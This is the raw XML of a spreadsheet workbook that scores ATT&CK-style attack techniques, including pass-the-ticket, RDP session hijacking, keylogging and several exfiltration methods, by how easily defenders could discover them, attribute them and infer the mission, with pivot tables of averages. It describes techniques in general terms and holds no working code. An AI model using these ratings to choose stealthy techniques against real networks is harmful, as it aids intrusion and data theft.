    <s v="Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system._x000a__x000a_In this technique, valid Kerberos tickets for Valid Accounts are captured by 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12_x000a__x000a_Silver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).1_x000a__x000a_Golden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory."/>
    <n v="2"/>
    <s v="NTLM 3 logons without domain login"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Remote Desktop Protocol"/>
    <x v="0"/>
    <s v="Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).1 There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS._x000a__x000a_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 technique for Persistence.2_x000a__x000a_Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.3 This can be done remotely or locally and with active or disconnected sessions.4 It can also lead to Remote System Discovery and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Remote Services"/>
    <x v="0"/>
    <s v="An adversary may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user."/>
    <n v="1"/>
    <s v="Login times and locations may be an indicator"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="2"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Taint Shared Content"/>
    <x v="0"/>
    <s v="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_x000a__x000a_A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses Shortcut Modification of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories.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n v="2"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Third-party Software"/>
    <x v="0"/>
    <s v="Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code._x000a__x000a_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_x000a__x000a_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n v="3"/>
    <s v="Uncommon software may indicate"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Windows Admin Shares"/>
    <x v="0"/>
    <s v="Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$._x000a__x000a_Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB)1 to interact with systems using remote procedure calls (RPCs),2 transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.3_x000a__x000a_The Net utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials."/>
    <n v="2"/>
    <s v="Access to high privilege network components can be monitored"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Windows Remote Management"/>
    <x v="0"/>
    <s v="Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).1 It may be called with the winrm command or by any number of programs such as PowerShell."/>
    <n v="2"/>
    <s v="Montor WinRM usage"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Technique may contain mission details"/>
  </r>
  <r>
    <s v="Audio Capture"/>
    <x v="2"/>
    <s v="An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information._x000a__x000a_Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later."/>
    <n v="0"/>
    <s v="Difficult to detect due to the API's available"/>
    <n v="0"/>
    <s v="Does not disclose attacker"/>
    <n v="2"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Automated Collection"/>
    <x v="2"/>
    <s v="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_x000a__x000a_This technique may incorporate use of other techniques such as File and Directory Discovery and Remote File Copy to identify and move files."/>
    <n v="2"/>
    <s v="Very visible for 2"/>
    <n v="1"/>
    <s v="Scripting may potential contain information on attacker"/>
    <n v="2"/>
    <s v="The search may reveal the type of data looking for"/>
  </r>
  <r>
    <s v="Clipboard Data"/>
    <x v="2"/>
    <s v="Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications."/>
    <n v="0"/>
    <s v="Access is indistinguishable from regular use"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Data Staged"/>
    <x v="2"/>
    <s v="Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted._x000a__x000a_Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location."/>
    <n v="3"/>
    <s v="Accumulation of large datastore is visible for administrators"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="4"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data from Information Repositories"/>
    <x v="2"/>
    <s v="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_x000a__x000a_The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:_x000a__x000a_Policies, procedures, and standards_x000a_Physical / logical network diagrams_x000a_System architecture diagrams_x000a_Technical system documentation_x000a_Testing / development credentials_x000a_Work / project schedules_x000a_Source code snippets_x000a_Links to network shares and other internal resources_x000a_Common information repositories:_x000a__x000a_Microsoft SharePoint_x000a_Found in many enterprise networks and often used to store and share significant amounts of documentation._x000a__x000a_Atlassian Confluence_x000a_Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation."/>
    <n v="0"/>
    <s v="With the right privileges, very hard to distinguis from legitimate use"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Data from Local System"/>
    <x v="2"/>
    <s v="Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration._x000a__x000a_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
    <n v="1"/>
    <s v="Process monitoring"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data from Network Shared Drive"/>
    <x v="2"/>
    <s v="Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration._x000a__x000a_Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data from Removable Media"/>
    <x v="2"/>
    <s v="Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration._x000a__x000a_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
    <n v="4"/>
    <s v="Slowness and unsuspected activity might alert user"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Email Collection"/>
    <x v="2"/>
    <s v="Adversaries may target user email to collect sensitive information from a target._x000a__x000a_Files containing email data can be acquired from a user's system, such as Outlook storage or cache files .pst and .ost._x000a__x000a_Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network._x000a__x000a_Some adversaries may acquire user credentials and access externally facing webmail applications, such as Outlook Web Access."/>
    <n v="1"/>
    <s v="Hard to detect"/>
    <n v="2"/>
    <s v="Credential usage may reveal the attacker"/>
    <n v="2"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Input Capture"/>
    <x v="2"/>
    <s v="Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception._x000a__x000a_Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes,1 but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider.2_x000a__x000a_Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises._x000a__x000a_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 and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service."/>
    <n v="2"/>
    <s v="Multiple indicators up to physical devices"/>
    <n v="3"/>
    <s v="In case of physical device, local presence is needed"/>
    <n v="1"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Man in the Browser"/>
    <x v="2"/>
    <s v="Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.1_x000a__x000a_A specific example is when an adversary injects software into a browser that allows an them to inherit cookies, HTTP sessions, and SSL client certificates of a user and use the browser as a way to pivot into an authenticated intranet.23_x000a__x000a_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n v="0"/>
    <s v="Indistinguisable from legitimate traffic"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Screen Capture"/>
    <x v="2"/>
    <s v="Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations."/>
    <n v="0"/>
    <s v="No artefacts generated"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Video Capture"/>
    <x v="2"/>
    <s v="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_x000a__x000a_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
    <n v="4"/>
    <s v="Most of the time webcams have alerting lights"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="Webcam may indicate that the target is part of the missions target"/>
  </r>
  <r>
    <s v="Automated Exfiltration"/>
    <x v="11"/>
    <s v="Data, such as sensitive documents, may be exfiltrated through the use of automated processing or Scripting after being gathered during Collection._x000a__x000a_When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol."/>
    <n v="2"/>
    <s v="Very visible for SOC"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="4"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Data Compressed"/>
    <x v="11"/>
    <s v="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
    <n v="4"/>
    <s v="Disk altered, slowness may occur"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data Encrypted"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol."/>
    <n v="4"/>
    <s v="Disk altered, slowness may occur"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Data Transfer Size Limits"/>
    <x v="11"/>
    <s v="An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts."/>
    <n v="2"/>
    <s v="Disk altered"/>
    <n v="1"/>
    <s v="Payload, hint to mission, which may indicate target"/>
    <n v="3"/>
    <s v="Payload is providing (one of) the outcome(s) of the mission"/>
  </r>
  <r>
    <s v="Exfiltration Over Alternative Protocol"/>
    <x v="11"/>
    <s v="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
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Exfiltration Over Command and Control Channel"/>
    <x v="11"/>
    <s v="Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications."/>
    <n v="2"/>
    <s v="Size of network traffic may generated addtional indicators"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Exfiltration Over Other Network Medium"/>
    <x v="11"/>
    <s v="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
    <n v="3"/>
    <s v="Configuration changes"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Exfiltration Over Physical Medium"/>
    <x v="11"/>
    <s v="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
    <n v="3"/>
    <s v="Traces in registry"/>
    <n v="4"/>
    <s v="Needs close proximity of threat actor"/>
    <n v="3"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>
    <s v="Scheduled Transfer"/>
    <x v="11"/>
    <s v="Data exfiltration may be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability._x000a__x000a_When scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over Command and Control Channel and Exfiltration Over Alternative Protocol."/>
    <n v="3"/>
    <s v="Pattern/filesize/protocol may trigger incident response"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="4"/>
    <s v="Data will contain mission sensitive information"/>
  </r>
  <r>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F75E95-3CD1-5549-958B-58AC4842A8E2}"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D17" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="10">
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="14">
        <item x="3"/>
        <item x="10"/>
        <item x="9"/>
        <item x="11"/>
        <item x="0"/>
        <item x="2"/>
        <item x="8"/>
        <item x="1"/>
        <item x="7"/>
        <item x="4"/>
        <item x="5"/>
        <item x="6"/>
        <item x="12"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>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Gemiddelde van DiscV" fld="4" subtotal="average" baseField="0" baseItem="0"/>
    <dataField name="Gemiddelde van AttribV" fld="6" subtotal="average" baseField="0" baseItem="0"/>
    <dataField name="Gemiddelde van IntentV" fld="8" subtotal="average" baseField="0" baseItem="0"/>
  </dataFields>
  <formats count="2">
    <format dxfId="8">
      <pivotArea outline="0" collapsedLevelsAreSubtotals="1" fieldPosition="0"/>
    </format>
    <format dxfId="7">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="3">
            <x v="0"/>
            <x v="1"/>
            <x v="2"/>
          </reference>
        </references>
      </pivotArea>
    </format>
  </formats>
  <conditionalFormats count="1">
    <conditionalFormat priority="1">
      <pivotAreas count="1">
        <pivotArea type="data" collapsedLevelsAreSubtotals="1" fieldPosition="0">
          <references count="1">
            <reference field="2" count="13">
              <x v="0"/>
              <x v="1"/>
              <x v="2"/>
              <x v="3"/>
              <x v="4"/>
              <x v="5"/>
              <x v="6"/>
              <x v="7"/>
              <x v="8"/>
              <x v="9"/>
              <x v="10"/>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0C38EC-66E2-9349-9A69-226F45FAE537}" name="Draaitabel2"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D16" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="10">
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="13">
        <item x="9"/>
        <item x="4"/>
        <item x="7"/>
        <item x="6"/>
        <item x="0"/>
        <item x="2"/>
        <item x="10"/>
        <item x="1"/>
        <item x="8"/>
        <item x="3"/>
        <item x="5"/>
        <item x="11"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField dataField="1"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Gemiddelde van DiscV" fld="4" subtotal="average" baseField="0" baseItem="0"/>
    <dataField name="Gemiddelde van AttribV" fld="6" subtotal="average" baseField="0" baseItem="0"/>
    <dataField name="Gemiddelde van IntentV" fld="8" subtotal="average" baseField="0" baseItem="0"/>
  </dataFields>
  <formats count="2">
    <format dxfId="6">
      <pivotArea outline="0" collapsedLevelsAreSubtotals="1" fieldPosition="0"/>
    </format>
    <format dxfId="5">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="3">
            <x v="0"/>
            <x v="1"/>
            <x v="2"/>
          </reference>
        </references>
      </pivotArea>
    </format>
  </formats>
  <conditionalFormats count="1">
    <conditionalFormat priority="1">
      <pivotAreas count="1">
        <pivotArea type="data" collapsedLevelsAreSubtotals="1" fieldPosition="0">
          <references count="1">
            <reference field="1"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BA3876-0B9E-F14A-9221-8F3856459782}" name="Draaitabel3"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7" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="10">
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="14">
        <item x="3"/>
        <item x="10"/>
        <item x="9"/>
        <item x="11"/>
        <item x="0"/>
        <item x="2"/>
        <item x="8"/>
        <item x="1"/>
        <item x="7"/>
        <item x="4"/>
        <item x="5"/>
        <item x="6"/>
        <item x="12"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField dataField="1"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Aantal van DiscV"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74E33-C871-024E-B94A-5306A13DD823}" name="Draaitabel1" cacheId="1"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rowHeaderCaption="Tactic">
  <location ref="A3:D17" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="9">
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="14">
        <item x="2"/>
        <item x="10"/>
        <item x="9"/>
        <item x="11"/>
        <item x="0"/>
        <item x="8"/>
        <item x="1"/>
        <item x="3"/>
        <item x="7"/>
        <item x="4"/>
        <item x="5"/>
        <item x="6"/>
        <item x="12"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
  </pivotFields>
  <rowFields count="1">
    <field x="1"/>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Average discovery risk" fld="3" subtotal="average" baseField="0" baseItem="0" numFmtId="164"/>
    <dataField name="Average Attribution risk" fld="5" subtotal="average" baseField="0" baseItem="0" numFmtId="164"/>
    <dataField name="Average Intent risk" fld="7" subtotal="average" baseField="0" baseItem="0" numFmtId="164"/>
  </dataFields>
  <formats count="5">
    <format dxfId="4">
      <pivotArea outline="0" collapsedLevelsAreSubtotals="1" fieldPosition="0"/>
    </format>
    <format dxfId="3">
      <pivotArea dataOnly="0" labelOnly="1" outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="3">
            <x v="0"/>
            <x v="1"/>
            <x v="2"/>
          </reference>
        </references>
      </pivotArea>
    </format>
    <format dxfId="2">
      <pivotArea outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="1">
            <x v="0"/>
          </reference>
        </references>
      </pivotArea>
    </format>
    <format dxfId="1">
      <pivotArea outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="1">
            <x v="1"/>
          </reference>
        </references>
      </pivotArea>
    </format>
    <format dxfId="0">
      <pivotArea outline="0" fieldPosition="0">
        <references count="1">
          <reference field="4294967294" count="1">
            <x v="2"/>
          </reference>
        </references>
      </pivotArea>
    </format>
  </formats>
  <conditionalFormats count="1">
    <conditionalFormat priority="1">
      <pivotAreas count="1">
        <pivotArea type="data" collapsedLevelsAreSubtotals="1" fieldPosition="0">
          <references count="1">
            <reference field="1"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E19A9-779A-3245-8A63-FE431C88BBFE}">
  <dimension ref="A3:D17"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G14" sqref="G14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="23.6640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="20" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="21.1640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="21.5" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3" s="6" t="s">
        <v>571</v>
      </c>
      <c r="B3" s="8" t="s">
        <v>566</v>
      </c>
      <c r="C3" s="8" t="s">
        <v>567</v>
      </c>
      <c r="D3" s="8" t="s">
        <v>568</v>
      </c>
    </row>
    <row r="4" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4" s="7" t="s">
        <v>15</v>
      </c>
      <c r="B4" s="8">
        <v>1.5333333333333334</v>
      </c>
      <c r="C4" s="8">
        <v>0.73333333333333328</v>
      </c>
      <c r="D4" s="8">
        <v>1.4</v>
      </c>
    </row>
    <row r="5" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5" s="7" t="s">
        <v>305</v>
      </c>
      <c r="B5" s="8">
        <v>1.7142857142857142</v>
      </c>
      <c r="C5" s="8">
        <v>0.7857142857142857</v>
      </c>
      <c r="D5" s="8">
        <v>7.1428571428571425E-2</v>
      </c>
    </row>
    <row r="6" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6" s="7" t="s">
        <v>245</v>
      </c>
      <c r="B6" s="8">
        <v>1.6190476190476191</v>
      </c>
      <c r="C6" s="8">
        <v>0.16666666666666666</v>
      </c>
      <c r="D6" s="8">
        <v>0.26190476190476192</v>
      </c>
    </row>
    <row r="7" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7" s="7" t="s">
        <v>380</v>
      </c>
      <c r="B7" s="8">
        <v>2.7777777777777777</v>
      </c>
      <c r="C7" s="8">
        <v>3</v>
      </c>
      <c r="D7" s="8">
        <v>3.2222222222222223</v>
      </c>
    </row>
    <row r="8" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8" s="7" t="s">
        <v>6</v>
      </c>
      <c r="B8" s="8">
        <v>2.0769230769230771</v>
      </c>
      <c r="C8" s="8">
        <v>7.6923076923076927E-2</v>
      </c>
      <c r="D8" s="8">
        <v>0.53846153846153844</v>
      </c>
    </row>
    <row r="9" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9" s="7" t="s">
        <v>12</v>
      </c>
      <c r="B9" s="8">
        <v>1</v>
      </c>
      <c r="C9" s="8">
        <v>0</v>
      </c>
      <c r="D9" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10" s="7" t="s">
        <v>227</v>
      </c>
      <c r="B10" s="8">
        <v>1.6111111111111112</v>
      </c>
      <c r="C10" s="8">
        <v>0.16666666666666666</v>
      </c>
      <c r="D10" s="8">
        <v>0.27777777777777779</v>
      </c>
    </row>
    <row r="11" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11" s="7" t="s">
        <v>9</v>
      </c>
      <c r="B11" s="8">
        <v>1.2142857142857142</v>
      </c>
      <c r="C11" s="8">
        <v>0</v>
      </c>
      <c r="D11" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12" s="7" t="s">
        <v>189</v>
      </c>
      <c r="B12" s="8">
        <v>1.7777777777777777</v>
      </c>
      <c r="C12" s="8">
        <v>2.9444444444444446</v>
      </c>
      <c r="D12" s="8">
        <v>1.0555555555555556</v>
      </c>
    </row>
    <row r="13" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13" s="7" t="s">
        <v>49</v>
      </c>
      <c r="B13" s="8">
        <v>2.6</v>
      </c>
      <c r="C13" s="8">
        <v>3.3</v>
      </c>
      <c r="D13" s="8">
        <v>0.7</v>
      </c>
    </row>
    <row r="14" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14" s="7" t="s">
        <v>70</v>
      </c>
      <c r="B14" s="8">
        <v>2.1739130434782608</v>
      </c>
      <c r="C14" s="8">
        <v>0.30434782608695654</v>
      </c>
      <c r="D14" s="8">
        <v>0.30434782608695654</v>
      </c>
    </row>
    <row r="15" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15" s="7" t="s">
        <v>117</v>
      </c>
      <c r="B15" s="8">
        <v>2.1052631578947367</v>
      </c>
      <c r="C15" s="8">
        <v>0.5</v>
      </c>
      <c r="D15" s="8">
        <v>0.31578947368421051</v>
      </c>
    </row>
    <row r="16" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A16" s="7" t="s">
        <v>572</v>
      </c>
      <c r="B16" s="8"/>
      <c r="C16" s="8"/>
      <c r="D16" s="8"/>
    </row>
    <row r="17" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17" s="7" t="s">
        <v>573</v>
      </c>
      <c r="B17" s="8">
        <v>1.8657407407407407</v>
      </c>
      <c r="C17" s="8">
        <v>0.79629629629629628</v>
      </c>
      <c r="D17" s="8">
        <v>0.56018518518518523</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting pivot="1" sqref="B4:D16">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percentile" val="50"/>
        <cfvo type="max"/>
        <color theme="9"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FFFF00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601C-F436-E744-B478-5AFF7A652925}">
  <dimension ref="A3:D16"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B10" sqref="B10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="19.5" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="20" style="8" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="21.1640625" style="8" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="21.5" style="8" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3" s="6" t="s">
        <v>571</v>
      </c>
      <c r="B3" s="8" t="s">
        <v>566</v>
      </c>
      <c r="C3" s="8" t="s">
        <v>567</v>
      </c>
      <c r="D3" s="8" t="s">
        <v>568</v>
      </c>
    </row>
    <row r="4" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4" s="7" t="s">
        <v>354</v>
      </c>
      <c r="B4" s="8">
        <v>1.4615384615384615</v>
      </c>
      <c r="C4" s="8">
        <v>0.84615384615384615</v>
      </c>
      <c r="D4" s="8">
        <v>1.6153846153846154</v>
      </c>
    </row>
    <row r="5" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5" s="7" t="s">
        <v>188</v>
      </c>
      <c r="B5" s="8">
        <v>1.7777777777777777</v>
      </c>
      <c r="C5" s="8">
        <v>2.9444444444444446</v>
      </c>
      <c r="D5" s="8">
        <v>1.0555555555555556</v>
      </c>
    </row>
    <row r="6" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6" s="7" t="s">
        <v>304</v>
      </c>
      <c r="B6" s="8">
        <v>1.7142857142857142</v>
      </c>
      <c r="C6" s="8">
        <v>0.7857142857142857</v>
      </c>
      <c r="D6" s="8">
        <v>7.1428571428571425E-2</v>
      </c>
    </row>
    <row r="7" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7" s="7" t="s">
        <v>244</v>
      </c>
      <c r="B7" s="8">
        <v>1.6190476190476191</v>
      </c>
      <c r="C7" s="8">
        <v>0.16666666666666666</v>
      </c>
      <c r="D7" s="8">
        <v>0.26190476190476192</v>
      </c>
    </row>
    <row r="8" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8" s="7" t="s">
        <v>5</v>
      </c>
      <c r="B8" s="8">
        <v>1.3157894736842106</v>
      </c>
      <c r="C8" s="8">
        <v>5.2631578947368418E-2</v>
      </c>
      <c r="D8" s="8">
        <v>0.10526315789473684</v>
      </c>
    </row>
    <row r="9" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9" s="7" t="s">
        <v>69</v>
      </c>
      <c r="B9" s="8">
        <v>2.1739130434782608</v>
      </c>
      <c r="C9" s="8">
        <v>0.30434782608695654</v>
      </c>
      <c r="D9" s="8">
        <v>0.30434782608695654</v>
      </c>
    </row>
    <row r="10" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10" s="7" t="s">
